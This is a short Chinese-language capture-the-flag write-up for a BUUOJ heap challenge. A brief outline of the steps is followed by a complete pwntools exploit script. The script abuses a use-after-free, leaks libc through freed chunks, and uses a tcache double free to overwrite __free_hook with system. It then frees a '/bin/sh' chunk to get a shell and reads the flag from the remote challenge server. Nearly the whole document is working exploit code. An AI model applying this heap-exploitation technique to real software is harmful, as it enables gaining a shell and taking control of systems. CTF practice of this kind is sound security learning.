自从300题后,难题让人搜不着,也有极简单的题,今天遇到一个
概况:
- c++写的程序,反汇编后一个字符串有1米长
- 冒: 6个字符依次或或6-1得到 H@QRPN
- free未清指针
步骤:
- 输入"NEUQRO" 开始
- 建80,70,10(/bin/sh\x00)
- free90 八次 70两次 show 0得到libc
- 建70 三次,依次写free_hook,x,system
- free 1
from pwn import *
elf = ELF('./pwn')
context.arch = 'amd64'
local = 0
if local == 1:
p = process('./pwn')
libc_elf = ELF('/home/shi/pwn/libc6_2.27-3u1/lib64/libc-2.27.so')
one = [0x4240e, 0x42462, 0xe31ee]
offset = 0x3b12a0 #__libc_IO_vtables:00000000003B12A0 _IO_file_jumps
else:
p = remote('node4.buuoj.cn', 25510)
libc_elf = ELF('../libc6_2.27-3ubuntu1_amd64.so')
one = [0x4f2c5, 0x4f322, 0x10a38c]
offset = 0x3e82a0 #__libc_IO_vtables:00000000003E82A0 _IO_file_jumps
# [print(chr(v^(6-i)), end='') for i,v in enumerate(b'H@QRPN')]
p.sendlineafter(b'name', b"NEUQRO")
menu = b'> \n'
def add(size, msg):
p.sendlineafter(menu, b'1')
p.sendlineafter(b'input the size \n', str(size).encode()) #<=0x100
p.sendlineafter(b"now you can input something...\n", msg)
def free(idx):
p.sendlineafter(menu, b'2')
p.sendlineafter(b'input the index\n', str(idx).encode()) # UAF
def show(idx):
p.sendlineafter(menu, b'3')
p.sendlineafter(b'input the index\n', str(idx).encode())
add(0x80, b'A')
add(0x10, b'/bin/sh\x00')
add(0x70, b'A')
[free(2) for _ in range(2)]
[free(0) for _ in range(8)]
show(0)
malloc_hook = u64(p.recvuntil(b'\x7f', drop=False).ljust(8, b'\x00')) - 0x60 -0x10
libc_base = malloc_hook - libc_elf.sym['__malloc_hook']
system = libc_base + libc_elf.sym['system']
free_hook = libc_base + libc_elf.sym['__free_hook']
print('libc:', hex(libc_base))
context.log_level = 'debug'
add(0x70, p64(free_hook))
#gdb.attach(p)
#pause()
add(0x70, b'A')
add(0x70, p64(system))
free(1)
p.sendline(b'cat /flag')
p.interactive()